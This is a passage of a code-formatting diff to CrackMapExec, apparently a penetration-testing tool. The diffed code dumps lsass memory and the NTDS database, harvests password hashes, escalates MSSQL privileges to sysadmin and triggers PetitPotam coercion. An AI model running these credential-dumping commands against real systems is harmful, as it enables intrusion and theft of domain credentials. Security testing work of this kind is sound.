remove the service named '{tracker.svc_name}', please remove it manually" - ) + context.log.fail(f"Fail to remove the service named '{tracker.svc_name}', please remove it manually") ret = False return ret diff --git a/cme/modules/ms17-010.py b/cme/modules/ms17-010.py index 3c98cd9c..86728dd7 100644 --- a/cme/modules/ms17-010.py +++ b/cme/modules/ms17-010.py @@ -22,9 +22,7 @@ class CMEModule: def on_login(self, context, connection): if check(connection.host): context.log.highlight("VULNERABLE") - context.log.highlight( - "Next step: https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/" - ) + context.log.highlight("Next step: https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/") class SMB_HEADER(Structure): diff --git a/cme/modules/msol.py b/cme/modules/msol.py index 194aa5a4..7fa5606c 100644 --- a/cme/modules/msol.py +++ b/cme/modules/msol.py @@ -8,9 +8,7 @@ from cme.helpers.powershell import get_ps_script class CMEModule: name = "msol" - description = ( - "Dump MSOL cleartext password from the localDB on the Azure AD-Connect Server" - ) + description = "Dump MSOL cleartext password from the localDB on the Azure AD-Connect Server" supported_protocols = ["smb"] opsec_safe = True multiple_hosts = True @@ -65,9 +63,7 @@ class CMEModule: context.log.display(f"Uploading {self.msol}") with open(file_to_upload, "rb") as msol: try: - connection.conn.putFile( - self.share, f"{self.tmp_share}{self.msol}", msol.read - ) + connection.conn.putFile(self.share, f"{self.tmp_share}{self.msol}", msol.read) context.log.success(f"Msol script successfully uploaded") except Exception as e: context.log.fail(f"Error writing file to share {self.tmp_share}: {e}") @@ -89,6 +85,4 @@ class CMEModule: connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.msol}") context.log.success(f"Msol script successfully deleted") except Exception as e: - context.log.fail( - f"[OPSEC] Error deleting msol script on {self.share}: {e}" - ) + context.log.fail(f"[OPSEC] Error deleting msol script on {self.share}: {e}") diff --git a/cme/modules/mssql_priv.py b/cme/modules/mssql_priv.py index 9d0d969a..58265721 100644 --- a/cme/modules/mssql_priv.py +++ b/cme/modules/mssql_priv.py @@ -92,12 +92,7 @@ class CMEModule: elif target_user.dbowner: self.do_dbowner_privesc(target_user.dbowner, exec_as) if self.is_admin_user(self.current_username): - self.context.log.success( - f"{self.current_username} is now a sysadmin! " - + highlight( - "({})".format(self.context.conf.get("CME", "pwn3d_label")) - ) - ) + self.context.log.success(f"{self.current_username} is now a sysadmin! 
" + highlight("({})".format(self.context.conf.get("CME", "pwn3d_label")))) def build_exec_as_from_path(self, target_user): path = [target_user.username] @@ -118,20 +113,13 @@ class CMEModule: return initial_user for grantor in user.grantors: if grantor.is_sysadmin: - self.context.log.success( - f"{user.username} can impersonate: " - f"{grantor.username} (sysadmin)" - ) + self.context.log.success(f"{user.username} can impersonate: " f"{grantor.username} (sysadmin)") return grantor elif grantor.dbowner: - self.context.log.success( - f"{user.username} can impersonate: {grantor.username} (which can privesc via dbowner)" - ) + self.context.log.success(f"{user.username} can impersonate: {grantor.username} (which can privesc via dbowner)") return grantor else: - self.context.log.display( - f"{user.username} can impersonate: {grantor.username}" - ) + self.context.log.display(f"{user.username} can impersonate: {grantor.username}") return self.browse_path(context, initial_user, grantor) def query_and_get_output(self, query): @@ -194,9 +182,7 @@ class CMEModule: return False def get_databases(self, exec_as="") -> list: - res = self.query_and_get_output( - exec_as + "SELECT name FROM master..sysdatabases" - ) + res = self.query_and_get_output(exec_as + "SELECT name FROM master..sysdatabases") self.revert_context(exec_as) self.context.log.debug(f"Response: {res}") self.context.log.debug(f"Response Type: {type(res)}") @@ -290,15 +276,11 @@ class CMEModule: return users def remove_sysadmin_priv(self) -> bool: - res = self.query_and_get_output( - f"EXEC sp_dropsrvrolemember '{self.current_username}', 'sysadmin'" - ) + res = self.query_and_get_output(f"EXEC sp_dropsrvrolemember '{self.current_username}', 'sysadmin'") return not self.is_admin() def is_admin_user(self, username) -> bool: - res = self.query_and_get_output( - f"SELECT IS_SRVROLEMEMBER('sysadmin', '{username}')" - ) + res = self.query_and_get_output(f"SELECT IS_SRVROLEMEMBER('sysadmin', '{username}')") try: if int(res): self.admin_privs = True diff --git a/cme/modules/nanodump.py b/cme/modules/nanodump.py index 59e31377..5b39589d 100644 --- a/cme/modules/nanodump.py +++ b/cme/modules/nanodump.py @@ -100,16 +100,10 @@ class CMEModule: if self.context.protocol == "smb": with open(self.nano_path + self.nano, "rb") as nano: try: - self.connection.conn.putFile( - self.share, self.tmp_share + self.nano, nano.read - ) - self.context.log.success( - f"Created file {self.nano} on the \\\\{self.share}{self.tmp_share}" - ) + self.connection.conn.putFile(self.share, self.tmp_share + self.nano, nano.read) + self.context.log.success(f"Created file {self.nano} on the \\\\{self.share}{self.tmp_share}") except Exception as e: - self.context.log.fail( - f"Error writing file to share {self.share}: {e}" - ) + self.context.log.fail(f"Error writing file to share {self.share}: {e}") else: with open(self.nano_path + self.nano, "rb") as nano: try: @@ -117,18 +111,12 @@ class CMEModule: exec_method = MSSQLEXEC(self.connection.conn) exec_method.put_file(nano.read(), self.tmp_dir + self.nano) if exec_method.file_exists(self.tmp_dir + self.nano): - self.context.log.success( - f"Created file {self.nano} on the remote machine {self.tmp_dir}" - ) + self.context.log.success(f"Created file {self.nano} on the remote machine {self.tmp_dir}") else: - self.context.log.fail( - "File does not exist on the remote system... error during upload" - ) + self.context.log.fail("File does not exist on the remote system... 
error during upload") sys.exit(1) except Exception as e: - self.context.log.fail( - f"Error writing file to remote machine directory {self.tmp_dir}: {e}" - ) + self.context.log.fail(f"Error writing file to remote machine directory {self.tmp_dir}: {e}") # apparently SMB exec methods treat the output parameter differently than MSSQL (we use it to display()) # if we don't do this, then SMB doesn't actually return the results of commands, so it appears that the @@ -178,45 +166,27 @@ class CMEModule: if self.context.protocol == "smb": with open(filename, "wb+") as dump_file: try: - self.connection.conn.getFile( - self.share, self.tmp_share + nano_log_name, dump_file.write - ) - self.context.log.success( - f"Dumpfile of lsass.exe was transferred to {filename}" - ) + self.connection.conn.getFile(self.share, self.tmp_share + nano_log_name, dump_file.write) + self.context.log.success(f"Dumpfile of lsass.exe was transferred to {filename}") except Exception as e: self.context.log.fail(f"Error while getting file: {e}") try: - self.connection.conn.deleteFile( - self.share, self.tmp_share + self.nano - ) - self.context.log.success( - f"Deleted nano file on the {self.share} share" - ) + self.connection.conn.deleteFile(self.share, self.tmp_share + self.nano) + self.context.log.success(f"Deleted nano file on the {self.share} share") except Exception as e: - self.context.log.fail( - f"Error deleting nano file on share {self.share}: {e}" - ) + self.context.log.fail(f"Error deleting nano file on share {self.share}: {e}") try: - self.connection.conn.deleteFile( - self.share, self.tmp_share + nano_log_name - ) - self.context.log.success( - f"Deleted lsass.dmp file on the {self.share} share" - ) + self.connection.conn.deleteFile(self.share, self.tmp_share + nano_log_name) + self.context.log.success(f"Deleted lsass.dmp file on the {self.share} share") except Exception as e: - self.context.log.fail( - f"Error deleting lsass.dmp file on share {self.share}: {e}" - ) + self.context.log.fail(f"Error deleting lsass.dmp file on share {self.share}: {e}") else: try: exec_method = MSSQLEXEC(self.connection.conn) exec_method.get_file(self.tmp_dir + nano_log_name, filename) - self.context.log.success( - f"Dumpfile of lsass.exe was transferred to {filename}" - ) + self.context.log.success(f"Dumpfile of lsass.exe was transferred to {filename}") except Exception as e: self.context.log.fail(f"Error while getting file: {e}") @@ -224,13 +194,9 @@ class CMEModule: try: self.connection.execute(f"del {self.tmp_dir + nano_log_name}") - self.context.log.success( - f"Deleted lsass.dmp file on the {self.tmp_dir} dir" - ) + self.context.log.success(f"Deleted lsass.dmp file on the {self.tmp_dir} dir") except Exception as e: - self.context.log.fail( - f"[OPSEC] Error deleting lsass.dmp file on dir {self.tmp_dir}: {e}" - ) + self.context.log.fail(f"[OPSEC] Error deleting lsass.dmp file on dir {self.tmp_dir}: {e}") fh = open(filename, "r+b") fh.seek(0) @@ -262,32 +228,22 @@ class CMEModule: for luid in pypy_parse.logon_sessions: for ssp in ssps: - for cred in getattr( - pypy_parse.logon_sessions[luid], ssp, [] - ): + for cred in getattr(pypy_parse.logon_sessions[luid], ssp, []): domain = getattr(cred, "domainname", None) username = getattr(cred, "username", None) password = getattr(cred, "password", None) NThash = getattr(cred, "NThash", None) if NThash is not None: NThash = NThash.hex() - if ( - username - and (password or NThash) - and "$" not in username - ): + if username and (password or NThash) and "$" not in username: if password: 
credtype = "password" credential = password else: credtype = "hash" credential = NThash - self.context.log.highlight( - f"{domain}\\{username}:{credential}" - ) - host_id = self.context.db.get_hosts( - self.connection.host - )[0][0] + self.context.log.highlight(f"{domain}\\{username}:{credential}") + host_id = self.context.db.get_hosts(self.connection.host)[0][0] self.context.db.add_credential( credtype, connection.domain, @@ -295,11 +251,7 @@ class CMEModule: credential, pillaged_from=host_id, ) - if ( - "." not in domain - and domain.upper() - in self.connection.domain.upper() - ): + if "." not in domain and domain.upper() in self.connection.domain.upper(): domain = self.connection.domain bh_creds.append( { @@ -308,9 +260,7 @@ class CMEModule: } ) if len(bh_creds) > 0: - add_user_bh( - bh_creds, None, self.context.log, self.connection.config - ) + add_user_bh(bh_creds, None, self.context.log, self.connection.config) except Exception as e: self.context.log.fail(f"Error opening dump file: {e}") @@ -319,6 +269,4 @@ class CMEModule: self.connection.execute(f"del {self.tmp_dir + self.nano}") self.context.log.success(f"Deleted nano file on the {self.share} dir") except Exception as e: - self.context.log.fail( - f"[OPSEC] Error deleting nano file on dir {self.tmp_dir}: {e}" - ) + self.context.log.fail(f"[OPSEC] Error deleting nano file on dir {self.tmp_dir}: {e}") diff --git a/cme/modules/nopac.py b/cme/modules/nopac.py index 06efd58e..d3c81d2c 100644 --- a/cme/modules/nopac.py +++ b/cme/modules/nopac.py @@ -21,9 +21,7 @@ class CMEModule: """ """ def on_login(self, context, connection): - user_name = Principal( - connection.username, type=constants.PrincipalNameType.NT_PRINCIPAL.value - ) + user_name = Principal(connection.username, type=constants.PrincipalNameType.NT_PRINCIPAL.value) try: tgt_with_pac, cipher, old_session_key, session_key = getKerberosTGT( user_name, @@ -52,6 +50,4 @@ class CMEModule: context.log.highlight("VULNERABLE") context.log.highlight("Next step: https://github.com/Ridter/noPac") except OSError as e: - context.log.debug( - f"Error connecting to Kerberos (port 88) on {connection.host}" - ) + context.log.debug(f"Error connecting to Kerberos (port 88) on {connection.host}") diff --git a/cme/modules/ntdsutil.py b/cme/modules/ntdsutil.py index b4fa2e80..b3979435 100644 --- a/cme/modules/ntdsutil.py +++ b/cme/modules/ntdsutil.py @@ -41,24 +41,14 @@ class CMEModule: self.no_delete = True def on_admin_login(self, context, connection): - command = ( - "powershell \"ntdsutil.exe 'ac i ntds' 'ifm' 'create full %s%s' q q\"" - % (self.tmp_dir, self.dump_location) - ) - context.log.display( - "Dumping ntds with ntdsutil.exe to %s%s" - % (self.tmp_dir, self.dump_location) - ) - context.log.highlight( - "Dumping the NTDS, this could take a while so go grab a redbull..." 
- ) + command = "powershell \"ntdsutil.exe 'ac i ntds' 'ifm' 'create full %s%s' q q\"" % (self.tmp_dir, self.dump_location) + context.log.display("Dumping ntds with ntdsutil.exe to %s%s" % (self.tmp_dir, self.dump_location)) + context.log.highlight("Dumping the NTDS, this could take a while so go grab a redbull...") context.log.debug("Executing command {}".format(command)) p = connection.execute(command, True) context.log.debug(p) if "success" in p: - context.log.success( - "NTDS.dit dumped to %s%s" % (self.tmp_dir, self.dump_location) - ) + context.log.success("NTDS.dit dumped to %s%s" % (self.tmp_dir, self.dump_location)) else: context.log.fail("Error while dumping NTDS") return @@ -69,16 +59,11 @@ class CMEModule: context.log.display("Copying NTDS dump to %s" % self.dir_result) context.log.debug("Copy ntds.dit to host") - with open( - os.path.join(self.dir_result, "Active Directory", "ntds.dit"), "wb+" - ) as dump_file: + with open(os.path.join(self.dir_result, "Active Directory", "ntds.dit"), "wb+") as dump_file: try: connection.conn.getFile( self.share, - self.tmp_share - + self.dump_location - + "\\" - + "Active Directory\\ntds.dit", + self.tmp_share + self.dump_location + "\\" + "Active Directory\\ntds.dit", dump_file.write, ) context.log.debug("Copied ntds.dit file") @@ -86,9 +71,7 @@ class CMEModule: context.log.fail("Error while get ntds.dit file: {}".format(e)) context.log.debug("Copy SYSTEM to host") - with open( - os.path.join(self.dir_result, "registry", "SYSTEM"), "wb+" - ) as dump_file: + with open(os.path.join(self.dir_result, "registry", "SYSTEM"), "wb+") as dump_file: try: connection.conn.getFile( self.share, @@ -100,9 +83,7 @@ class CMEModule: context.log.fail("Error while get SYSTEM file: {}".format(e)) context.log.debug("Copy SECURITY to host") - with open( - os.path.join(self.dir_result, "registry", "SECURITY"), "wb+" - ) as dump_file: + with open(os.path.join(self.dir_result, "registry", "SECURITY"), "wb+") as dump_file: try: connection.conn.getFile( self.share, @@ -116,16 +97,9 @@ class CMEModule: try: command = "rmdir /s /q %s%s" % (self.tmp_dir, self.dump_location) p = connection.execute(command, True) - context.log.success( - "Deleted %s%s remote dump directory" - % (self.tmp_dir, self.dump_location) - ) + context.log.success("Deleted %s%s remote dump directory" % (self.tmp_dir, self.dump_location)) except Exception as e: - context.log.fail( - "Error deleting {} remote directory on share {}: {}".format( - self.dump_location, self.share, e - ) - ) + context.log.fail("Error deleting {} remote directory on share {}: {}".format(self.dump_location, self.share, e)) localOperations = LocalOperations("%s/registry/SYSTEM" % self.dir_result) bootKey = localOperations.getBootKey() @@ -153,16 +127,12 @@ class CMEModule: username, _, lmhash, nthash, _, _, _ = hash.split(":") parsed_hash = ":".join((lmhash, nthash)) if validate_ntlm(parsed_hash): - context.db.add_credential( - "hash", domain, username, parsed_hash, pillaged_from=host_id - ) + context.db.add_credential("hash", domain, username, parsed_hash, pillaged_from=host_id) add_ntds_hash.added_to_db += 1 return raise except: - context.log.debug( - "Dumped hash is not NTLM, not adding to db for now ;)" - ) + context.log.debug("Dumped hash is not NTLM, not adding to db for now ;)") else: context.log.debug("Dumped hash is a computer account, not adding to db") @@ -187,9 +157,7 @@ class CMEModule: ) try: - context.log.success( - "Dumping the NTDS, this could take a while so go grab a redbull..." 
- ) + context.log.success("Dumping the NTDS, this could take a while so go grab a redbull...") NTDS.dump() context.log.success( "Dumped {} NTDS hashes to {} of which {} were added to the database".format( @@ -198,26 +166,15 @@ class CMEModule: highlight(add_ntds_hash.added_to_db), ) ) - context.log.display( - "To extract only enabled accounts from the output file, run the following command: " - ) - context.log.display( - "grep -iv disabled {} | cut -d ':' -f1".format( - connection.output_filename + ".ntds" - ) - ) + context.log.display("To extract only enabled accounts from the output file, run the following command: ") + context.log.display("grep -iv disabled {} | cut -d ':' -f1".format(connection.output_filename + ".ntds")) except Exception as e: context.log.fail(e) NTDS.finish() if self.no_delete: - context.log.display( - "Raw NTDS dump copied to %s, parse it with:" % self.dir_result - ) - context.log.display( - 'secretsdump.py -system %s/registry/SYSTEM -security %s/registry/SECURITY -ntds "%s/Active Directory/ntds.dit" LOCAL' - % (self.dir_result, self.dir_result, self.dir_result) - ) + context.log.display("Raw NTDS dump copied to %s, parse it with:" % self.dir_result) + context.log.display('secretsdump.py -system %s/registry/SYSTEM -security %s/registry/SECURITY -ntds "%s/Active Directory/ntds.dit" LOCAL' % (self.dir_result, self.dir_result, self.dir_result)) else: shutil.rmtree(self.dir_result) diff --git a/cme/modules/ntlmv1.py b/cme/modules/ntlmv1.py index 41b2cccd..98481a49 100644 --- a/cme/modules/ntlmv1.py +++ b/cme/modules/ntlmv1.py @@ -44,14 +44,10 @@ class CMEModule: "lmcompatibilitylevel\x00", ) except rrp.DCERPCSessionError as e: - context.log.debug( - f"Unable to reference lmcompatabilitylevel, which probably means ntlmv1 is not set" - ) + context.log.debug(f"Unable to reference lmcompatabilitylevel, which probably means ntlmv1 is not set") if rtype and data and int(data) in [0, 1, 2]: - context.log.highlight( - self.output.format(connection.conn.getRemoteHost(), data) - ) + context.log.highlight(self.output.format(connection.conn.getRemoteHost(), data)) except DCERPCSessionError as e: context.log.debug(f"Error connecting to RemoteRegistry: {e}") finally: diff --git a/cme/modules/output-test.py b/cme/modules/output-test.py new file mode 100644 index 00000000..df2612ae --- /dev/null +++ b/cme/modules/output-test.py @@ -0,0 +1,33 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + + +class CMEModule: + name = "test" + description = "I do something" + supported_protocols = ["smb"] + opsec_safe = True # Does the module touch disk? + multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time? + + def __init__(self, context=None, module_options=None): + self.context = context + self.module_options = module_options + + def options(self, context, module_options): + """Required. + Module options get parsed here. Additionally, put the modules usage here as well + """ + pass + + def on_admin_login(self, context, connection): + """Concurrent. 
+ Required if on_login is not present + This gets called on each authenticated connection with Administrative privileges + """ + context.log.info("info") + context.log.display("display") + context.log.success("success") + context.log.highlight("highlight") + context.log.fail("error test") + context.log.fail("fail test") + context.log.debug("debug") diff --git a/cme/modules/petitpotam.py b/cme/modules/petitpotam.py index 70841215..49b4115d 100644 --- a/cme/modules/petitpotam.py +++ b/cme/modules/petitpotam.py @@ -21,9 +21,7 @@ from impacket.uuid import uuidtup_to_bin class CMEModule: name = "petitpotam" - description = ( - "Module to check if the DC is vulnerable to PetitPotam, credit to @topotam" - ) + description = "Module to check if the DC is vulnerable to PetitPotam, credit to @topotam" supported_protocols = ["smb"] opsec_safe = True multiple_hosts = True @@ -47,9 +45,7 @@ class CMEModule: domain=connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, - target=connection.host - if not connection.kerberos - else connection.hostname + "." + connection.domain, + target=connection.host if not connection.kerberos else connection.hostname + "." + connection.domain, pipe=self.pipe, do_kerberos=connection.kerberos, dc_host=connection.kdcHost, @@ -228,9 +224,7 @@ def coerce( "MSRPC_UUID_EFSR": ("c681d488-d850-11d0-8c52-00c04fd90f7e", "1.0"), }, } - rpc_transport = transport.DCERPCTransportFactory( - binding_params[pipe]["stringBinding"] - ) + rpc_transport = transport.DCERPCTransportFactory(binding_params[pipe]["stringBinding"]) if hasattr(rpc_transport, "set_credentials"): rpc_transport.set_credentials( username=username, @@ -281,9 +275,7 @@ def efs_rpc_open_file_raw(dce, listener, context=None): context.log.info("[+] Attack worked!") return True if str(e).find("rpc_s_access_denied") >= 0: - context.log.info( - "[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!" - ) + context.log.info("[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!") context.log.info("[+] OK! 
Using unpatched function!") context.log.info("[-] Sending EfsRpcEncryptFileSrv!") try: @@ -296,8 +288,6 @@ def efs_rpc_open_file_raw(dce, listener, context=None): context.log.info("[+] Attack worked!") return True else: - context.log.debug( - "Something went wrong, check error status => %s" % str(e) - ) + context.log.debug("Something went wrong, check error status => %s" % str(e)) else: context.log.debug("Something went wrong, check error status => %s" % str(e)) diff --git a/cme/modules/printnightmare.py b/cme/modules/printnightmare.py index 2861cbc4..98f069b5 100644 --- a/cme/modules/printnightmare.py +++ b/cme/modules/printnightmare.py @@ -102,14 +102,10 @@ class CMEModule: return False # If vulnerable, 'ERROR_INVALID_PARAMETER' will be returned if e.error_code == system_errors.ERROR_INVALID_PARAMETER: - context.log.highlight( - "Vulnerable, next step https://github.com/ly4k/PrintNightmare" - ) + context.log.highlight("Vulnerable, next step https://github.com/ly4k/PrintNightmare") return True raise e - context.log.highlight( - "Vulnerable, next step https://github.com/ly4k/PrintNightmare" - ) + context.log.highlight("Vulnerable, next step https://github.com/ly4k/PrintNightmare") return True @@ -198,18 +194,10 @@ class DRIVER_INFO_2_BLOB(Structure): name_len = name.find("\0") self["Name"] = checkNullString(name[:name_len]) - self["ConfigFile"] = data[ - self["ConfigFileOffset"] + offset : self["DataFileOffset"] + offset - ].decode("utf-16-le") - self["DataFile"] = data[ - self["DataFileOffset"] + offset : self["DriverPathOffset"] + offset - ].decode("utf-16-le") - self["DriverPath"] = data[ - self["DriverPathOffset"] + offset : self["EnvironmentOffset"] + offset - ].decode("utf-16-le") - self["Environment"] = data[ - self["EnvironmentOffset"] + offset : self["NameOffset"] + offset - ].decode("utf-16-le") + self["ConfigFile"] = data[self["ConfigFileOffset"] + offset : self["DataFileOffset"] + offset].decode("utf-16-le") + self["DataFile"] = data[self["DataFileOffset"] + offset : self["DriverPathOffset"] + offset].decode("utf-16-le") + self["DriverPath"] = data[self["DriverPathOffset"] + offset : self["EnvironmentOffset"] + offset].decode("utf-16-le") + self["Environment"] = data[self["EnvironmentOffset"] + offset : self["NameOffset"] + offset].decode("utf-16-le") class DRIVER_INFO_2_ARRAY(Structure): diff --git a/cme/modules/procdump.py b/cme/modules/procdump.py index 9bdb2612..246f9790 100644 --- a/cme/modules/procdump.py +++ b/cme/modules/procdump.py @@ -59,19 +59,11 @@ class CMEModule: with open(self.procdump_path + self.procdump, "wb") as procdump: procdump.write(self.procdump_embeded) - context.log.display( - "Copy {} to {}".format(self.procdump_path + self.procdump, self.tmp_dir) - ) + context.log.display("Copy {} to {}".format(self.procdump_path + self.procdump, self.tmp_dir)) with open(self.procdump_path + self.procdump, "rb") as procdump: try: - connection.conn.putFile( - self.share, self.tmp_share + self.procdump, procdump.read - ) - context.log.success( - "Created file {} on the \\\\{}{}".format( - self.procdump, self.share, self.tmp_share - ) - ) + connection.conn.putFile(self.share, self.tmp_share + self.procdump, procdump.read) + context.log.success("Created file {} on the \\\\{}{}".format(self.procdump, self.share, self.tmp_share)) except Exception as e: context.log.fail(f"Error writing file to share {self.share}: {e}") @@ -80,15 +72,7 @@ class CMEModule: context.log.display("Getting lsass PID {}".format(command)) p = connection.execute(command, True) pid = 
p.split(",")[1][1:-1] - command = ( - self.tmp_dir - + self.procdump - + " -accepteula -ma " - + pid - + " " - + self.tmp_dir - + "%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.dmp" - ) + command = self.tmp_dir + self.procdump + " -accepteula -ma " + pid + " " + self.tmp_dir + "%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.dmp" context.log.display("Executing command {}".format(command)) p = connection.execute(command, True) context.log.debug(p) @@ -113,38 +97,22 @@ class CMEModule: with open(self.dir_result + machine_name, "wb+") as dump_file: try: - connection.conn.getFile( - self.share, self.tmp_share + machine_name, dump_file.write - ) - context.log.success( - "Dumpfile of lsass.exe was transferred to {}".format( - self.dir_result + machine_name - ) - ) + connection.conn.getFile(self.share, self.tmp_share + machine_name, dump_file.write) + context.log.success("Dumpfile of lsass.exe was transferred to {}".format(self.dir_result + machine_name)) except Exception as e: context.log.fail("Error while get file: {}".format(e)) try: connection.conn.deleteFile(self.share, self.tmp_share + self.procdump) - context.log.success( - "Deleted procdump file on the {} share".format(self.share) - ) + context.log.success("Deleted procdump file on the {} share".format(self.share)) except Exception as e: - context.log.fail( - "Error deleting procdump file on share {}: {}".format(self.share, e) - ) + context.log.fail("Error deleting procdump file on share {}: {}".format(self.share, e)) try: connection.conn.deleteFile(self.share, self.tmp_share + machine_name) - context.log.success( - "Deleted lsass.dmp file on the {} share".format(self.share) - ) + context.log.success("Deleted lsass.dmp file on the {} share".format(self.share)) except Exception as e: - context.log.fail( - "Error deleting lsass.dmp file on share {}: {}".format( - self.share, e - ) - ) + context.log.fail("Error deleting lsass.dmp file on share {}: {}".format(self.share, e)) with open(self.dir_result + machine_name, "rb") as dump: try: @@ -167,28 +135,17 @@ class CMEModule: ] for luid in pypy_parse.logon_sessions: for ssp in ssps: - for cred in getattr( - pypy_parse.logon_sessions[luid], ssp, [] - ): + for cred in getattr(pypy_parse.logon_sessions[luid], ssp, []): domain = getattr(cred, "domainname", None) username = getattr(cred, "username", None) password = getattr(cred, "password", None) NThash = getattr(cred, "NThash", None) if NThash is not None: NThash = NThash.hex() - if ( - username - and (password or NThash) - and "$" not in username - ): + if username and (password or NThash) and "$" not in username: print_pass = password if password else NThash - context.log.highlight( - domain + "\\" + username + ":" + print_pass - ) - if ( - "." not in domain - and domain.upper() in connection.domain.upper() - ): + context.log.highlight(domain + "\\" + username + ":" + print_pass) + if "." 
not in domain and domain.upper() in connection.domain.upper(): domain = connection.domain credz_bh.append( { diff --git a/cme/modules/rdcman.py b/cme/modules/rdcman.py index 08763bfa..ccc2d44a 100644 --- a/cme/modules/rdcman.py +++ b/cme/modules/rdcman.py @@ -12,9 +12,7 @@ from cme.helpers.logger import highlight class CMEModule: name = "rdcman" - description = ( - "Remotely dump Remote Desktop Connection Manager (sysinternals) credentials" - ) + description = "Remotely dump Remote Desktop Connection Manager (sysinternals) credentials" supported_protocols = ["smb"] opsec_safe = True multiple_hosts = True @@ -64,9 +62,7 @@ class CMEModule: dc_conn.connect() if dc_conn.is_admin: - context.log.success( - "User is Domain Administrator, exporting domain backupkey..." - ) + context.log.success("User is Domain Administrator, exporting domain backupkey...") backupkey_triage = BackupkeyTriage(target=dc, conn=dc_conn) backupkey = backupkey_triage.triage_backupkey() self.pvkbytes = backupkey.backupkey_v2 @@ -96,16 +92,8 @@ class CMEModule: context.log.debug("Could not upgrade connection: {}".format(e)) return - plaintexts = { - username: password - for _, _, username, password, _, _ in context.db.get_credentials( - cred_type="plaintext" - ) - } - nthashes = { - username: nt.split(":")[1] if ":" in nt else nt - for _, _, username, nt, _, _ in context.db.get_credentials(cred_type="hash") - } + plaintexts = {username: password for _, _, username, password, _, _ in context.db.get_credentials(cred_type="plaintext")} + nthashes = {username: nt.split(":")[1] if ":" in nt else nt for _, _, username, nt, _, _ in context.db.get_credentials(cred_type="hash")} if password != "": plaintexts[username] = password if nthash != "": @@ -128,11 +116,7 @@ class CMEModule: context.log.fail("No masterkeys looted") return - context.log.success( - "Got {} decrypted masterkeys. Looting RDCMan secrets".format( - highlight(len(self.masterkeys)) - ) - ) + context.log.success("Got {} decrypted masterkeys. 
Looting RDCMan secrets".format(highlight(len(self.masterkeys)))) try: triage = RDGTriage(target=target, conn=conn, masterkeys=self.masterkeys) diff --git a/cme/modules/rdp.py b/cme/modules/rdp.py index b60e21eb..91f12183 100644 --- a/cme/modules/rdp.py +++ b/cme/modules/rdp.py @@ -62,9 +62,7 @@ class CMEModule: 0, ) - rtype, data = rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "fDenyTSConnections\x00" - ) + rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "fDenyTSConnections\x00") if int(data) == 0: context.log.success("RDP enabled successfully") @@ -97,9 +95,7 @@ class CMEModule: 1, ) - rtype, data = rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "fDenyTSConnections\x00" - ) + rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "fDenyTSConnections\x00") if int(data) == 1: context.log.success("RDP disabled successfully") diff --git a/cme/modules/reg-query.py b/cme/modules/reg-query.py index b6ed6017..cb754906 100644 --- a/cme/modules/reg-query.py +++ b/cme/modules/reg-query.py @@ -64,25 +64,17 @@ class CMEModule: try: self.value = int(self.value) except: - context.log.fail( - f"Invalid registry value type specified: {self.value}" - ) + context.log.fail(f"Invalid registry value type specified: {self.value}") return if self.type in type_dict: self.type = type_dict[self.type] else: - context.log.fail( - f"Invalid registry value type specified: {self.type}" - ) + context.log.fail(f"Invalid registry value type specified: {self.type}") return else: self.type = 1 - if ( - module_options - and "DELETE" in module_options - and module_options["DELETE"].lower() == "true" - ): + if module_options and "DELETE" in module_options and module_options["DELETE"].lower() == "true": self.delete = True def on_admin_login(self, context, connection): @@ -108,46 +100,32 @@ class CMEModule: self.path = self.path.replace("HKCR\\", "") ans = rrp.hOpenClassesRoot(remote_ops._RemoteOperations__rrp) else: - self.context.log.fail( - f"Unsupported registry hive specified in path: {self.path}" - ) + self.context.log.fail(f"Unsupported registry hive specified in path: {self.path}") return reg_handle = ans["phKey"] - ans = rrp.hBaseRegOpenKey( - remote_ops._RemoteOperations__rrp, reg_handle, self.path - ) + ans = rrp.hBaseRegOpenKey(remote_ops._RemoteOperations__rrp, reg_handle, self.path) key_handle = ans["phkResult"] if self.delete: # Delete registry try: # Check if value exists - data_type, reg_value = rrp.hBaseRegQueryValue( - remote_ops._RemoteOperations__rrp, key_handle, self.key - ) + data_type, reg_value = rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, self.key) except: self.context.log.fail(f"Registry key {self.key} does not exist") return # Delete value - rrp.hBaseRegDeleteValue( - remote_ops._RemoteOperations__rrp, key_handle, self.key - ) - self.context.log.success( - f"Registry key {self.key} has been deleted successfully" - ) + rrp.hBaseRegDeleteValue(remote_ops._RemoteOperations__rrp, key_handle, self.key) + self.context.log.success(f"Registry key {self.key} has been deleted successfully") rrp.hBaseRegCloseKey(remote_ops._RemoteOperations__rrp, key_handle) if self.value is not None: # Check if value exists try: # Check if value exists - data_type, reg_value = rrp.hBaseRegQueryValue( - remote_ops._RemoteOperations__rrp, key_handle, self.key - ) - self.context.log.highlight( - f"Key {self.key} exists with value {reg_value}" - ) + data_type, reg_value = 
